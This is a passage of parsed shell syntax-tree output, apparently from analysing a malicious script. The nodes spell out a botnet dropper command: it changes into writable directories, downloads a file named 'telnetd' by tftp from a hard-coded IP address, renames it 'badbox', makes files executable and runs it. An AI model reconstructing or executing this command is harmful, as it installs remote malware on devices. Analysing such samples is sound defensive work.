  OperatorNode(lineno=15, op=';', pos=(1523, 1524)),
  CommandNode(lineno=15, pos=(1524, 1532), parts=[
    WordNode(lineno=15, pos=(1524, 1532), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1533, 1661), parts=[
  CommandNode(lineno=16, pos=(1533, 1540), parts=[
    WordNode(lineno=16, pos=(1533, 1535), word='cd'),
    WordNode(lineno=16, pos=(1536, 1540), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1541, 1543)),
  CommandNode(lineno=16, pos=(1544, 1555), parts=[
    WordNode(lineno=16, pos=(1544, 1546), word='cd'),
    WordNode(lineno=16, pos=(1547, 1555), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1556, 1558)),
  CommandNode(lineno=16, pos=(1559, 1566), parts=[
    WordNode(lineno=16, pos=(1559, 1561), word='cd'),
    WordNode(lineno=16, pos=(1562, 1566), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1567, 1569)),
  CommandNode(lineno=16, pos=(1570, 1578), parts=[
    WordNode(lineno=16, pos=(1570, 1572), word='cd'),
    WordNode(lineno=16, pos=(1573, 1578), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1579, 1581)),
  CommandNode(lineno=16, pos=(1582, 1586), parts=[
    WordNode(lineno=16, pos=(1582, 1584), word='cd'),
    WordNode(lineno=16, pos=(1585, 1586), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1586, 1587)),
  CommandNode(lineno=16, pos=(1588, 1621), parts=[
    WordNode(lineno=16, pos=(1588, 1592), word='tftp'),
    WordNode(lineno=16, pos=(1593, 1606), word='174.138.58.34'),
    WordNode(lineno=16, pos=(1607, 1609), word='-c'),
    WordNode(lineno=16, pos=(1610, 1613), word='get'),
    WordNode(lineno=16, pos=(1614, 1621), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1621, 1622)),
  CommandNode(lineno=16, pos=(1622, 1641), parts=[
    WordNode(lineno=16, pos=(1622, 1625), word='cat'),
    WordNode(lineno=16, pos=(1626, 1633), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1635, 1641), word='badbox'), pos=(1634, 1641), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1641, 1642)),
  CommandNode(lineno=16, pos=(1642, 1652), parts=[
    WordNode(lineno=16, pos=(1642, 1647), word='chmod'),
    WordNode(lineno=16, pos=(1648, 1650), word='+x'),
    WordNode(lineno=16, pos=(1651, 1652), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1652, 1653)),
  CommandNode(lineno=16, pos=(1653, 1661), parts=[
    WordNode(lineno=16, pos=(1653, 1661), word='./badbox'),
  ]),
])
